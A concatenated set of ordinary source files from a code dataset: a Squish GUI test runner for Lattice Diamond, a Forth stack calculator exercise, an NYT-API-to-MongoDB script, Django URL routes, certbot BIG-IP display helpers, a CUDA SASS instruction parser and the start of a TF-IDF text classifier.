scan_result.bat']\r\n else:\r\n cmd_lines_a = [r'cp ./case/*.ini ./log/',\r\n r'cp ./case/run.bat ./log/',]\r\n cmd_lines_b = [r'svn export http://d50534/auto/trunk --username=public --password=lattice --force',\r\n r'call run.bat']\r\n sts = 0\r\n for cmd in cmd_lines_a:\r\n if os.system(cmd):\r\n sts = \"Failed to run %s\" % cmd\r\n break\r\n os.chdir(\"log\")\r\n if not sts:\r\n for cmd in cmd_lines_b:\r\n if os.system(cmd):\r\n sts = \"Failed to run %s\" % cmd\r\n break\r\n os.chdir(cur_dir)\r\n return sts\r\n\r\n def run_option_parser(self):\r\n parser = optparse.OptionParser()\r\n parser.add_option(\"--debug\", action=\"store_true\", help=\"print debug message\")\r\n parser.add_option(\"--diamond\", help=\"specify Diamond install path\")\r\n parser.add_option(\"--squish\", help=\"specify Squish install path\")\r\n parser.add_option(\"--suite\", help=\"specify Squish Suite path\")\r\n parser.add_option(\"--case\", help=\"specify Squish case name\")\r\n parser.add_option(\"--x86\", action=\"store_true\", help=\"run with x86 vendor tools\")\r\n parser.add_option(\"--rpt-dir\", default=\"results\", help=\"specify final report path\")\r\n parser.add_option(\"--kill-all\", action=\"store_true\", help=\"kill all processes about Squish\")\r\n parser.add_option(\"--timeout\", type=\"int\", default=0, help=\"specify timeout value\")\r\n parser.add_option(\"--smoke\", action=\"store_true\", help=\"run smoke regression test only\")\r\n parser.add_option(\"--aut\", help=\"specify the AUT file name\")\r\n parser.add_option(\"--dev-path\", help=\"specify DEV(core scripts) path\")\r\n\r\n opts, args = parser.parse_args()\r\n self.debug = opts.debug\r\n self.diamond = opts.diamond\r\n self.squish = opts.squish\r\n self.suite = opts.suite\r\n self.case = opts.case\r\n self.x86 = opts.x86\r\n self.rpt_dir = opts.rpt_dir\r\n self.kill_all = opts.kill_all\r\n self.timeout = opts.timeout\r\n self.smoke = opts.smoke\r\n self.aut_name = opts.aut\r\n self.dev_path = opts.dev_path\r\n\r\n if not self.diamond:\r\n self.diamond = os.getenv(\"DIAMOND_\")\r\n if not self.squish:\r\n self.squish = os.getenv(\"SQUISH_\")\r\n if self.dev_path:\r\n if xTools.not_exists(self.dev_path, \"DEV Path\"):\r\n return 1\r\n os.environ[\"EXTERNAL_DEV_PATH\"] = xTools.win2unix(self.dev_path)\r\n\r\n def kill_all_squish_processes(self):\r\n if self.on_win:\r\n ps_cmd = \"%s -ef\" % os.path.join(self.xlib, \"ps\")\r\n else:\r\n ps_cmd = \"ps -ef | grep %s\" % self.user\r\n\r\n sts, tasklist = xTools.get_status_output(ps_cmd)\r\n if sts:\r\n xTools.say_it(\"-Error. Failed to run %s\" % ps_cmd)\r\n return 1\r\n xTools.say_it(tasklist, \"Tasklist:\", self.debug)\r\n\r\n kill_list = (\"squishrunner\", \"squishserver\")\r\n kill_pattern = [re.compile(item, re.I) for item in kill_list]\r\n for item in tasklist:\r\n item = item.strip()\r\n for p in kill_pattern:\r\n m = p.search(item)\r\n if m:\r\n break\r\n else:\r\n continue\r\n item_list = re.split(\"\\s+\", item)\r\n pid = int(item_list[1])\r\n kill_cmd(pid, self.on_win)\r\n\r\n def sanity_check(self):\r\n if xTools.not_exists(self.diamond, \"Diamond Install Path\"):\r\n return 1\r\n self.diamond = os.path.abspath(self.diamond)\r\n\r\n if xTools.not_exists(self.squish, \"Squish Install Path\"):\r\n return 1\r\n self.squish = os.path.abspath(self.squish)\r\n self.squishserver = os.path.join(self.squish, \"bin\", \"squishserver\")\r\n self.squishrunner = os.path.join(self.squish, \"bin\", \"squishrunner\")\r\n self.dllpreload = os.path.join(self.squish, \"bin\", \"dllpreload\")\r\n\r\n if xTools.not_exists(self.suite, \"Test Suite Path\"):\r\n return 1\r\n self.suite = os.path.abspath(self.suite)\r\n\r\n if xTools.wrap_md(self.rpt_dir, \"Report Path\"):\r\n return 2\r\n self.rpt_dir = os.path.abspath(self.rpt_dir)\r\n\r\n if self.aut_name:\r\n real_aut_file_name = xTools.get_fname(self.aut_name)\r\n if self.on_win:\r\n real_aut_file_name += \".exe\"\r\n self.aut = os.path.join(self.diamond, \"bin\", self.nt_lin, real_aut_file_name)\r\n else:\r\n if self.on_win:\r\n self.aut = os.path.join(self.diamond, \"bin\", self.nt_lin, \"pnmain.exe\")\r\n else:\r\n self.aut = os.path.join(self.diamond, \"bin\", self.nt_lin, \"diamond\")\r\n if xTools.not_exists(self.aut, \"AUT Path\"):\r\n return 1\r\n\r\n def run_it(self):\r\n if self.create_aut():\r\n return 1\r\n if self.copy_layout():\r\n return 1\r\n if self.run_suite():\r\n return 1\r\n\r\n def create_aut(self):\r\n self.aut_file = os.path.join(self.rpt_dir, \"tmp_aut.bat\")\r\n tmp_aut_lines = list()\r\n if self.on_win:\r\n tmp_aut_lines.append(\"set SQUISH_LIBQTDIR=%s\" % os.path.dirname(self.aut))\r\n tmp_aut_lines.append(\"%s %s\" % (self.dllpreload, self.aut))\r\n else:\r\n tmp_aut_lines.append(\"#!/bin/sh\")\r\n tmp_aut_lines.append(self.aut)\r\n xTools.write_file(self.aut_file, tmp_aut_lines)\r\n os.chmod(self.aut_file, stat.S_IRWXU)\r\n\r\n def copy_layout(self):\r\n for foo in os.listdir(self.suite):\r\n fname, fext = os.path.splitext(foo)\r\n if fext.lower() == \".ini\":\r\n src_ini = os.path.join(self.suite, foo)\r\n if self.on_win:\r\n dst_ini = os.path.join(r\"C:\\Users\\%s\\AppData\\Roaming\\LatticeSemi\\pnlayout\" % self.user, foo)\r\n else:\r\n dst_ini = os.path.join(\"/users/%s/.config/LatticeSemi/pnlayout\" % self.user, foo)\r\n if xTools.wrap_cp_file(src_ini, dst_ini):\r\n xTools.say_it(\"Failed to copy from {} to {}\".format(src_ini, dst_ini))\r\n return 1\r\n\r\n def copy_all_suite_2_rpt_dir(self):\r\n new_suite_dir = os.path.join(self.rpt_dir, os.path.basename(self.suite))\r\n if os.path.isdir(new_suite_dir):\r\n self.suite = new_suite_dir\r\n return\r\n try:\r\n shutil.copytree(self.suite, new_suite_dir)\r\n except Exception as e:\r\n print(e)\r\n return 1\r\n\r\n parent_dir = os.path.dirname(self.suite)\r\n for foo in os.listdir(parent_dir):\r\n if foo == \"case\":\r\n src_foo = os.path.join(parent_dir, foo)\r\n dst_foo = os.path.join(self.rpt_dir, foo)\r\n if os.path.isdir(dst_foo):\r\n continue\r\n try:\r\n shutil.copytree(src_foo, dst_foo)\r\n except Exception as e:\r\n print(e)\r\n return 1\r\n self.suite = new_suite_dir # use the copied one!\r\n\r\n def run_suite(self):\r\n if self.copy_all_suite_2_rpt_dir():\r\n return 1\r\n flow_dict = dict(\r\n name_of_aut=os.path.basename(self.aut_file),\r\n path_to_aut=os.path.dirname(self.aut_file),\r\n\r\n squishserver=self.squishserver,\r\n squishrunner=self.squishrunner,\r\n\r\n testsuite=self.suite,\r\n reportgen=os.path.join(self.rpt_dir, \"report.xml\"),\r\n cwd=self.rpt_dir,\r\n )\r\n\r\n if self.on_win:\r\n flow_dict[\"run_server\"] = 'start \"SquishServer Window\" /B \"%s\" --verbose' % self.squishserver\r\n flow_dict[\"sleep\"] = \"%s 5\" % os.path.join(self.xlib, \"sleep\")\r\n else:\r\n flow_dict[\"run_server\"] = \"%s &\" % self.squishserver\r\n flow_dict[\"sleep\"] = \"sleep 5\"\r\n if self.case:\r\n flow_dict[\"testcase\"] = \"--testcase %s\" % self.case\r\n else:\r\n flow_dict[\"testcase\"] = \"\"\r\n\r\n if self.update_for_smoke_test():\r\n return 1\r\n\r\n run_lines = RUN_SQUISH % flow_dict\r\n run_suite_file = os.path.join(self.rpt_dir, \"run_squish.bat\")\r\n xTools.write_file(run_suite_file, run_lines)\r\n\r\n if self.on_win:\r\n sts = xTools.run_command(run_suite_file,\r\n os.path.join(self.rpt_dir, \"run_squish.log\"),\r\n os.path.join(self.rpt_dir, \"run_squish.time\"))\r\n else:\r\n sts = xTools.run_command(\"sh %s\" % run_suite_file,\r\n os.path.join(self.rpt_dir, \"run_squish.log\"),\r\n os.path.join(self.rpt_dir, \"run_squish.time\"))\r\n return sts\r\n\r\n def update_for_smoke_test(self):\r\n _root_dir = self.suite\r\n if self.case:\r\n _root_dir = os.path.join(self.suite, self.case)\r\n if xTools.not_exists(_root_dir, \"Root Suite/Case Path\"):\r\n return 1\r\n for root, dirs, files in os.walk(_root_dir):\r\n for item in files:\r\n fext = xTools.get_fext_lower(item)\r\n if fext == \".tsv\":\r\n tsv_file = os.path.join(root, item)\r\n if self.update_tsv_file(tsv_file):\r\n return 1\r\n\r\n def update_tsv_file(self, tsv_file):\r\n tsv_lines = xTools.get_original_lines(tsv_file)\r\n new_tsv_lines = list()\r\n i, smoke_idx = 0, -1\r\n for line in tsv_lines:\r\n line = line.strip()\r\n line_list = shlex.split(line)\r\n new_line = \"\\t\".join(line_list)\r\n if not self.smoke:\r\n new_tsv_lines.append(new_line)\r\n continue\r\n if not i: # the title line\r\n new_tsv_lines.append(new_line)\r\n try:\r\n smoke_idx = line_list.index(\"smoke\")\r\n except ValueError:\r\n pass\r\n i = 1\r\n else: # the design case info line\r\n if smoke_idx < 0: # no smoke tag\r\n new_tsv_lines.append(new_line)\r\n else: # has smoke tag\r\n try:\r\n smoke_tag = line_list[smoke_idx]\r\n except IndexError:\r\n smoke_tag = \"0\"\r\n if smoke_tag == \"0\":\r\n pass\r\n else:\r\n new_tsv_lines.append(new_line)\r\n\r\n if xTools.write_file(tsv_file, new_tsv_lines):\r\n return 1\r\n\r\nif __name__ == \"__main__\":\r\n my_flow = RunSquish()\r\n final_sts = my_flow.process()\r\n sys.exit(final_sts)\r\n\r\n\r\n\r\n\r\n","sub_path":"tmp_client/tools/corescripts3/DEV/tools/runSquish/run_squish.py","file_name":"run_squish.py","file_ext":"py","file_size_in_byte":13234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"488320603","text":"import numpy as np\nimport pickle\n\n\ndata_path = '../data/book_order_1_train.pkl'\n\nwith open(data_path, 'rb') as handle:\n data = pickle.load(handle)\n\ntimes, x = data['t'], data['x']\n\nprint(\"Time statistics, Number of users\", len(times))\nd = np.concatenate([y[1:, 0] for y in times], axis = None)\nprint(\"Interval stat: Min, Max, mu, std: \", d.min(), d.max(), d.mean(), d.std())\n\nprint(\"x statistics\")\nys = np.concatenate([y for y in x], axis = None)\nvals, cnts = np.unique(ys, return_counts = True)\nprint(\"Number of events: \", np.max(vals)+1)\nprint(\"Count Distribution: \", cnts.min(), cnts.max(), cnts.mean(), cnts.std(), cnts.sum())\n\n\n","sub_path":"src/utils/get_stat.py","file_name":"get_stat.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"230024765","text":"# Forth라는 컴퓨터 언어는 스택 연산을 기반으로 하고 있어 후위 표기법을 사용한다. 예를 들어 3+4는 다음과 같이 표기한다.\n\n# 3 4 + .\n\n# Forth에서는 동작은 다음과 같다.\n\n# 숫자는 스택에 넣는다.\n\n# 연산자를 만나면 스택의 숫자 두 개를 꺼내 더하고 결과를 다시 스택에 넣는다.\n\n# ‘.’은 스택에서 숫자를 꺼내 출력한다.\n\n# Forth 코드의 연산 결과를 출력하는 프로그램을 만드시오. 만약 형식이 잘못되어 연산이 불가능한 경우 ‘error’를 출력한다.\n\n# 다음은 Forth 연산의 예이다.\n\n# [입력]\n\n# 첫 줄에 테스트 케이스 개수 T가 주어진다. 1≤T≤50\n \n# 다음 줄부터 테스트 케이스의 별로 정수와 연산자가 256자 이내의 연산코드가 주어진다. 피연산자와 연산자는 여백으로 구분되어 있으며, 코드는 ‘.’로 끝난다.\n\n# 나눗셈의 경우 항상 나누어 떨어진다.\n\n# [출력]\n\n# #과 1번부터인 테스트케이스 번호, 빈칸에 이어 계산결과를 정수로 출력하거나 또는 ‘error’를 출력한다.\n\ntest = int(input())\n\nfor n in range(test):\n code = list(input().split())\n res =[]\n flag=0\n for i in range(len(code)-1):\n if code[i].isdigit():\n res.append(code[i])\n else:\n try:\n num2, num1 = int(res.pop()), int(res.pop())\n if code[i] == \"+\": result = num1 + num2\n elif code[i] == \"-\": result = num1 - num2\n elif code[i] == \"/\": result = num1 // num2\n elif code[i] == \"*\": result = num1 * num2\n res.append(str(result))\n except:\n flag = 987654321\n \n if len(res) == 1 or flag==0:\n print(\"#{} {}\".format((n+1),res[0]))\n elif flag == 987654321 or len(res)>1:\n print(\"#{} {}\".format((n+1),\"error\"))\n ","sub_path":"KJW/Intermediate/5.Stack/Forth.py","file_name":"Forth.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"158915681","text":"import os\nimport requests\nfrom pymongo import MongoClient\n\nclient = MongoClient() # Establish connection to persistent storage\ndb = client['NewYorkTimes'] # Access/Initiate Database\narticles = db['articles'] # Access/Initiate Table\n\ndef single_query(endpoint, payload):\n response = requests.get(endpoint, params=payload)\n if response.status_code != 200:\n print('WARNING', response.status_code)\n else:\n return response.json()\n\nif __name__ == '__main__':\n endpoint = 'http://api.nytimes.com/svc/search/v2/articlesearch.json'\n ny_times = os.environ['NYT_API_KEY']\n for x in range(10):\n\n payload = {'api-key': ny_times, 'page':x}\n response = single_query(endpoint, payload)\n #db.articles.insert(response)\n\n doclist = response['response']['docs']\n for doc in doclist:\n db.articles.insert(doc)\n\n print(response.keys())\n print(response.values())\n\n#Object.keys(db.articles.findOne())\n#db.articles.find({word_count: {$gt: 500}}).count()\n","sub_path":"example-api-requests/query-pymongo.py","file_name":"query-pymongo.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"392383978","text":"from django.urls import path\nfrom . import views\n\napp_name='accounts'\nurlpatterns = [\n\n path(\"create_account/\", views.create_account, name='create_account'),\n path(\"movements_form/\", views.movements_form, name='movements_form'),\n path(\"pay_form/\", views.pay_form, name='pay_form'),\n path('view_accounts/', views.view_accounts, name=\"view_accounts\"),\n path('account_detail//', views.account_detail, name=\"account_detail\"),#id is passed in the clicked link\n path('account_detail///confirmation/', views.sure_delete, name=\"sure_delete\"),#id is passed in the clicked link\n path('account_detail//confirmation/', views.delete_account, name=\"delete_account\"),#id is passed in the clicked link\n path('transaction_done/', views.transaction_done, name=\"transaction_done\"),\n path('account_deleted/', views.account_deleted, name=\"account_deleted\"),\n path('account_created/', views.account_created, name=\"account_created\"),\n path('pay_form//', views.edit_pay_form, name=\"edit_pay_form\"),\n path('movements_form//', views.edit_movement_form, name=\"edit_movement_form\"),\n path('bank_statement/', views.upload_file, name=\"upload_file\"),\n path('readed_successfully/', views.readed_successfully, name=\"readed_successfully\"),\n\n]","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"602279522","text":"\"\"\"Contains UI methods for F5 BIG-IP operations.\"\"\"\nimport logging\nimport os\n\nimport zope.component\n\nfrom certbot import errors\nfrom certbot import interfaces\n\nimport certbot.display.util as display_util\n\nlogger = logging.getLogger(__name__)\n\ndef select_vservers(domain, vservers):\n \"\"\"Select an appropriate F5 BIG-IP Virtual Server.\n\n :param vservers: Available F5 BIG-IP Virtual Servers\n :type vservers: :class:`list` of type `~obj.Vserver`\n\n :returns: VirtualServer or `None`\n :rtype: `~obj.Vserver` or `None`\n\n \"\"\"\n if not vservers:\n return None\n while True:\n code, tag = _vserver_menu(domain, vservers)\n if code == display_util.HELP:\n _more_info_vserver(vservers[tag])\n elif code == display_util.OK:\n return vservers[tag]\n else:\n return None\n\n\ndef _vserver_menu(domain, vservers):\n \"\"\"Select an appropriate F5 BIG-IP Virtual Server.\n\n :param vservers: Available F5 BIG-IP Virtual Servers\n :type vservers: :class:`list` of type `~obj.Vserver`\n\n :returns: Display tuple - ('code', tag')\n :rtype: `tuple`\n\n \"\"\"\n # Free characters in the line of display text (9 is for ' | ' formatting)\n free_chars = display_util.WIDTH - len(\"HTTPS\") - len(\"Enabled\") - 9\n\n if free_chars < 2:\n logger.debug(\"Display size is too small for \"\n \"certbot_bigip.display_ops._vserver_menu()\")\n # This runs the edge off the screen, but it doesn't cause an \"error\"\n filename_size = 1\n disp_name_size = 1\n else:\n # Filename is a bit more important and probably longer with 000-*\n filename_size = int(free_chars * .6)\n disp_name_size = free_chars - filename_size\n\n choices = []\n for vserver in vservers:\n if len(vserver.get_names()) == 1:\n disp_name = next(iter(vserver.get_names()))\n elif len(vserver.get_names()) == 0:\n disp_name = \"\"\n else:\n disp_name = \"Multiple Names\"\n\n choices.append(\n \"{fn:{fn_size}s} | {name:{name_size}s} | {https:5s} | \"\n \"{active:7s}\".format(\n fn=os.path.basename(vserver.filep)[:filename_size],\n name=disp_name[:disp_name_size],\n https=\"HTTPS\" if vserver.ssl else \"\",\n active=\"Enabled\" if vserver.enabled else \"\",\n fn_size=filename_size,\n name_size=disp_name_size)\n )\n\n try:\n code, tag = zope.component.getUtility(interfaces.IDisplay).menu(\n \"We were unable to find a virtual server with name\"\n \"{0}.{1}Which virtual server would you \"\n \"like to choose?\\n\".format(domain, os.linesep),\n choices, help_label=\"More Info\", ok_label=\"Select\")\n except errors.MissingCommandlineFlag as e:\n msg = (\"Failed to run F5 BIG-IP plugin non-interactively{1}{0}{1}\"\n \"(Login to the F5 BIG-IP devices probably failed\".format(e, os.linesep))\n raise errors.MissingCommandlineFlag(msg)\n\n return code, tag\n\ndef _more_info_vserver(vserver):\n zope.component.getUtility(interfaces.IDisplay).notification(\n \"Virtual Server Information:{0}{1}{0}{2}\".format(\n os.linesep, \"-\" * (display_util.WIDTH - 4), str(vserver)),\n height=display_util.HEIGHT)\n","sub_path":"certbot-bigip/certbot_bigip/display_ops.py","file_name":"display_ops.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"167035798","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport struct\nfrom .common import *\n\nclass CuInsParser():\n '''CuInsParser will parse the instruction string to inskey, values, and modifiers.\n\n Which could be then assembled by CuInsAssembler.'''\n\n def __init__(self):\n self.m_InsAddr = 0 # ins address, needed by branch type of ins\n self.m_InsString = '' # original asm string\n self.m_CTrString = '' # constants translated asm string\n self.m_InsCode = None # instruction code\n\n self.m_InsKey = '' # key for current type of ins, eg: FFMA_R_R_R_R\n self.m_InsOp = '' # function name, such as FFMA, MOV, ...\n self.m_InsOpFull = '' # function name with modifiers\n self.m_InsPredVal = 0 # predicate value (0b****)\n self.m_InsPredStr = '' # predicate string\n self.m_InsModifier = [] # modifier dict\n self.m_InsVals = [] # array of operand values (not include labels)\n\n def dumpInfo(self):\n print('#### CuInsParser @ 0x%016x ####' % id(self))\n print('InsString: ' + self.m_InsString)\n print('CTrString: ' + self.m_CTrString)\n print('InsAddr: 0x%x' % self.m_InsAddr)\n print('InsPred: %s (%s)' % (self.m_InsPredStr, bin(self.m_InsPredVal)) )\n print('InsCode: 0x%032x' % self.m_InsCode)\n print('InsKey: ' + self.m_InsKey)\n print('InsVals: ' + intList2Str(self.m_InsVals))\n print('InsModifier: ' + str(self.m_InsModifier))\n print('\\n')\n\n def parse(self, s, addr=0, code=None):\n ''' Parse input string as instruction.'''\n\n self.m_InsString = s\n self.m_CTrString = self.__doConstTr(s)\n r = c_InsPattern.match(self.m_CTrString)\n if r is None:\n return None\n #raise ValueError(\"Unknown instruction: \" + s)\n\n self.m_InsAddr = addr\n self.m_InsCode = code\n self.m_InsPredStr = r.groups()[0]\n\n # Currently pred is treated as known format operand\n # The value will be directly computed.\n self.m_InsPredVal = self.__parsePred(self.m_InsPredStr)\n\n ins_main = r.groups()[1]\n\n # TODO: use more robust tokenizer\n tokens = re.split(', ', ins_main) # Splitting operands\n # usually ', ' will be sufficient to split the operands\n # ( ',' alone does not work for barset such as {3,4} )\n # ( space alone does not work for c[0x0] [0x0].F32 )\n # Exception: \"RET.REL.NODEC R10 0x0 ;\"\n # we will split it again, treat it as another separate operand\n ts = tokens[0].split(' ')\n ts.extend(tokens[1:])\n\n tokens = [t.strip() for t in ts]\n op_tokens = tokens[0].split('.') # Op and Op modifiers\n self.m_InsKey = op_tokens[0]\n self.m_InsOp = op_tokens[0]\n self.m_InsOpFull = tokens[0]\n\n self.m_InsVals = [self.m_InsPredVal]\n self.m_InsModifier = ['0_'+m for m in op_tokens] # TODO: May be we can treat pos dep modifiers here?\n\n for iop,op in enumerate(tokens[1:]):\n if len(op)==0: # ?\n continue\n\n optype, opval, opmodi = self.__parseOperand(op)\n self.m_InsKey += '_' + optype\n self.m_InsVals.extend(opval)\n self.m_InsModifier.extend([('%d_'%(iop+1))+m for m in opmodi])\n\n self.__specialTreatment() #\n\n return self.m_InsKey, self.m_InsVals, self.m_InsModifier\n\n def __doConstTr(self, s):\n '''Translate pre-defined constants (RZ/URZ/PT/...) to known or indexed values.'''\n\n for cm in c_ConstTrDict:\n s = re.sub(cm, c_ConstTrDict[cm], s)\n\n return s\n\n def __parseOperand(self, operand):\n '''Parse operand to (type, val, modi).\n\n Every operand should return with:\n type:str, val:list, modi:list'''\n\n #print('Parsing operand: ' + operand)\n\n # Every operand may have one or more modifiers\n op, modi = self.stripModifier(operand)\n\n if c_IndexedPattern.match(op) is not None:\n optype, opval, tmodi = self.__parseIndexedToken(op)\n opmodi = modi\n elif op[0] == '[': # address\n optype, opval, opmodi = self.__parseAddress(op)\n elif op[0] == '{': # BarSet such as {3,4}, only for DEPBAR (deprecated? could set in control codes)\n optype, opval, opmodi = self.__parseBarSet(op)\n elif op.startswith('c['):\n optype, opval, opmodi = self.__parseConstMemory(op)\n opmodi.extend(modi)\n elif op.startswith('0x'):\n optype = 'II'\n opval, opmodi = self.__parseIntImme(operand)\n elif c_FIType.match(operand) is not None:\n optype = 'FI'\n opval = [self.__parseFloatImme(operand)]\n opmodi = []\n else: # label type, keep as is\n optype = operand\n opval = [1]\n opmodi = []\n\n return optype, opval, opmodi\n\n def __parseIndexedToken(self, s):\n '''Parse index token such as R0, UR1, P2, UP3, B4, SB5, ...\n\n (RZ, URZ, PT should be translated In advance)'''\n\n tmain, modi = self.stripModifier(s)\n r = c_IndexedPattern.search(tmain)\n t = r.groups()[0]\n v = [int(r.groups()[1])]\n return t, v, modi\n\n def __parsePred(self, s):\n '''Parse predicates to values. '''\n\n if s is None or len(s)==0:\n return 7\n\n t, v, modi = self.__parseIndexedToken(s.lstrip('@'))\n if 'NOT' in modi:\n return v[0] + 8\n else:\n return v[0]\n\n def __parseFloatImme(self, s):\n '''Parse float point immediates to binary, according to the instruction precision.\n\n precision is the opcode precision, currently D/F/H for double/single(float)/half.\n NOTE: currently, +/-QNAN will be always translated to a UNIQUE binary,\n but sometimes nan could represent a set of values.\n But since it's not showed in the assembly string, there's no way to recover this value.\n '''\n\n # NEW feature: binary literal for float\n if s.startswith('0f') or s.startswith('0F'):\n v = int(s[2:], 16)\n return v\n\n f = float(s) # default to double\n\n if self.m_InsOp.startswith('F'):\n fbyte = struct.pack('f', f)\n v = struct.unpack('I', fbyte)[0]\n elif self.m_InsOp.startswith('D'):\n fbyte = struct.pack('d', f)\n v = struct.unpack('II', fbyte)[1] # for double immediates, only first 32bit is used.\n # TODO: handle endianness ???\n elif self.m_InsOp.startswith('H'):\n fbyte = struct.pack('e', f)\n v = struct.unpack('H', fbyte)[0]\n elif self.m_InsOp==\"MUFU\":\n # if '0_RCP64H' in self.m_InsModifier:\n # fbyte = struct.pack('d', f)\n # v = struct.unpack('II', fbyte)[1]\n # else:\n fbyte = struct.pack('f', f)\n v = struct.unpack('I', fbyte)[0]\n else:\n self.dumpInfo()\n raise ValueError('Unknown float precision (%s)!'% self.m_InsOp)\n\n return v\n\n def __parseIntImme(self, s):\n ''' Parse interger immediates.\n\n Positive int immediate are always kept as is,\n but negtive ints may depend on the type.\n When as arithmatic operand, it should be 32bit.\n When as address offset, it is 24bit.\n Currently we try to let the coefficient determined by the code, not predetermined.\n '''\n\n i = int(s, 16)\n\n if i>=0:\n return [i], []\n else:\n return [i], ['NegIntImme']\n\n def __parseConstMemory(self, s):\n opmain, opmodi = self.stripModifier(s)\n\n r = c_ConstMemType.match(opmain)\n if r is None:\n raise ValueError(\"Invalid constant memory operand: %s\" %s)\n\n opval = [int(r.groups()[0], 16)]\n\n atype, aval, amodi = self.__parseAddress(r.groups()[1])\n\n optype = 'c' + atype\n opval.extend(aval)\n opmodi.extend(amodi)\n\n return optype, opval, opmodi\n\n def __parseBarSet(self, s):\n '''Parse operand type Bar, such as {3,4}.\n\n This instruction is deprecated, since now every instruction\n has control codes to set barriers.'''\n\n ss = s.strip('{}').split(',')\n v = 0\n for bs in ss:\n v += 1<<(int(bs))\n\n return 'BARSET', [v], []\n\n def __parseAddress(self, s):\n '''Parse operand type Address [R0.X8+UR4+-0x8]'''\n\n ss = s.strip('[]').split('+')\n\n optype = 'A'\n opval = []\n opmodi = []\n for ts in ss:\n if '0x' in ts:\n optype += 'I'\n i_opval, i_opmodi = self.__parseIntImme(ts)\n opval.extend(i_opval)\n opmodi.extend(i_opmodi)\n else:\n ttype, tval, tmodi = self.__parseIndexedToken(ts)\n optype += ttype\n opval.extend(tval)\n opmodi.extend(tmodi)\n\n return optype, opval, opmodi\n\n def __specialTreatment(self):\n ''' Special treatments after parsing.\n\n Handle exceptions that cannot processed with current approach.\n '''\n\n if self.m_InsOp == 'PLOP3': # immLut for PLOP3 is encoded with seperating 5+3 bits\n # e.g.: 0x2a = 0b00101010 => 00101 xxxxx 010\n # LOP3 seems fine\n v = self.m_InsVals[-2]\n self.m_InsVals[-2] = (v&7) + ((v&0xf8)<<5)\n elif self.m_InsOp in ['I2F','F2I','F2F']:\n # I2F/F2I/F2F has different OpCode for 32/64,\n # but 32bit modifier may not be displayed\n if '64' in self.m_InsOpFull:\n self.m_InsModifier.append('0_CVT64')\n elif self.m_InsOp in c_AddrFuncs: # Functions that use address of current instruction\n if self.m_InsKey.endswith('_II'):\n if self.m_InsOp in ['CALL', 'RET'] and 'ABS' in self.m_InsOpFull:\n pass\n else:\n # TODO: eliminate the hardcode for negative address offset\n addr = self.m_InsVals[-1] - self.m_InsAddr - 0x10\n if addr<0:\n addr = 2**50 + addr\n self.m_InsVals[-1] = addr\n\n if self.m_InsOp in c_PosDepFuncs:\n # the modifier of I2I/F2F is position dependent\n # eg: F2F.F32.F64 vs F2F.F64.F32\n # TODO: find all instructions with position dependent modifiers\n for i,m in enumerate(self.m_InsModifier):\n if m.startswith('0_'):\n self.m_InsModifier[i] += '@%d'%i\n\n def stripModifier(self, s):\n '''Split the token to three parts\n\n preModifier([~-|!]), opmain, postModifier(.FTZ, .X16, ...) '''\n\n r = c_ModifierPattern.match(s) # split token to three parts\n\n if r is None:\n raise ValueError(\"Unknown token %s\" % s)\n else:\n pre = r.groups()[0]\n post = r.groups()[2]\n\n opmain = r.groups()[1]\n opmodi = []\n\n for c in pre:\n opmodi.append(c_OpPreModifierChar[c])\n\n for c in post.split('.'):\n if len(c)==0:\n continue\n opmodi.append(c)\n\n return opmain, opmodi\n\n @staticmethod\n def transAddr2Label(s):\n pass\n","sub_path":"CuAsm/CuInsParser.py","file_name":"CuInsParser.py","file_ext":"py","file_size_in_byte":11706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"469564917","text":"\"\"\"\n * @author raj\n * @create date 2019-09-10 11:45:56\n * @modify date 2019-10-15 11:58:06\n * @desc tf-idf, SVD and GuassianNB() to classify text documents\n\"\"\"\n\n\n\n\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport os\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.stem import PorterStemmer\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nimport numpy as np\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.model_selection import train_test_split\n\n\n\ndef removeStopWords(content):\n\tstopWords = set(stopwords.words('english'))\n\twordTokens = word_tokenize(content)\n\tfilteredContent = [word for word in wordTokens if not word in stopWords]\n\tfilteredContent = []\n\tfor word in wordTokens:\n\t\tif word not in stopWords:\n\t\t\tfilteredContent.append(word)\n\tfinalContent = \"\"\n\tfor word in filteredContent:\n\t\tfinalContent += word + \" \"\n\treturn finalContent\n\n\ndef removeStemming(content):\n\tposterStemmer = PorterStemmer()\n\twordList = word_tokenize(content)\n\tresultContent = \"\"\n\tfor word in wordList:\n\t\tresultContent += posterStemmer.stem(word) + \" \"\n\t\n\treturn resultContent\n\ndef removeDigits(inputString):\n\tresultString = ''.join([i for i in inputString if not i.isdigit()])\n\treturn resultString\n\n\ndef removePunctuations(content):\n\ttokenizer = RegexpTokenizer(r'\\w+')\n\ttokenizedContent = tokenizer.tokenize(content)\n\tfinalContent = \"\"\n\tfor word in tokenizedContent:\n\t\tfinalContent += word + \" \"\n\treturn finalContent\n\n\n\n\ndef preProcessData(content):\n\tcontent = removeStopWords(content)\n\tcontent = removeStemming(content)\n\tcontent = removeDigits(content)\n\tcontent = removePunctuations(content)\n\treturn content\n\ncorups = []\nlabeledData = []\n\ndef processForDir(directoryPath):\n\t\n\tfor (root, dirs, files) in os.walk(directoryPath):\n\t\tfor file in files:\n\n\t\t\twith open(directoryPath+'/'+file, 'rb') as fileInput:\n\n\t\t\t\tcontent = fileInput.read().decode(errors='replace')\n\t\t\t\tcontent = 